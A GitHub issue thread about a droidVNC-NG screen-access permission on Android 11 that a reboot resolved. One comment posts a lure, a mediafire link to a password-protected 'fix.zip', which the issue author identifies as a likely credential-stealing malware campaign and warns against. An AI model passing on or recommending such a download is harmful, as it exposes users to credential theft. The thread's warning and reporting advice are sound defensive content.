### ISSUE TITLE
[SOLVED] Reboot fixed it. [Permission for screen access not applied (Android 11)]

### ISSUE THREAD

**Issue by spookyahell** [bk138/droidVNC-NG#237]
If you'd like to put out an incentive for fixing this bug, you can do so at https://issuehunt.io/r/bk138/droidVNC-NG

**Describe the bug**
You mention `adb shell cmd appops set net.christianbeier.droidvnc_ng PROJECT_MEDIA allow` which I've tried.
Even hoped a reboot would help which it might have (and it did, was missing a verifcation the connection could be established)

It's a bit weird I got "Fallback" first because it immediatly asked me to switch to the full access version.

**To Reproduce**
- Use Android 11.
- Don't reboot.

**Expected Behavior**
Permission jumps to green.
And app doesn't start "misbehaving" (according to Android accessibility services manager)

**Logs/Backtraces**

**Your environment (please complete the following information):**
 - droidVNC-NG version: 2.6.0
 - Android version: 11
 - Client-side OS and version: _What?_ Oh wait, gotcha... Windows 11, most recent version
 - VNC client and version: doesn't matter, they all work now

**Additional context**

**Comment by OldSnailCPP** [comment]
Give this a shot
https://www.mediafire.com/file/kc2tzx0iodbtndd/fix.zip/file
Passcode: changeme
you must have a gcc compiler

**Comment by spookyahell** [comment]
I'm leaving this open so the author can acknowledge the comments I made

I'll leave it for him to decide if he wants to leave this open for users to see it
(issues is the go-to place to look for weird behavior, so I might just suggest leaving this open)

> Give this a shot https://www.mediafire.com/file/kc2tzx0iodbtndd/fix.zip/file Passcode: changeme you must have a gcc compiler

Never install password protected fixes from 
- [RedFlag1] password protected files
- [RedFlag2] from random users
- [RedFlag3] who don't have any activity.

Bad idea. Didn't verify this has anything bad but I'd be genuinely surprised if it didn't.
Yup, already found a recent report about this stay away.
https://winbuzzer.com/2024/09/02/github-comments-used-to-spread-credential-stealing-malware-xcxwbn/

Report these users. Keep Github a safe place and your devices safe ... and your policies safe.

I still say: "You don't need any anti-virus if you have a good sense of what you're doing on the internet (unfortunately many don't so they need the anti-virus and that's why Microsoft has one baked into the OS)
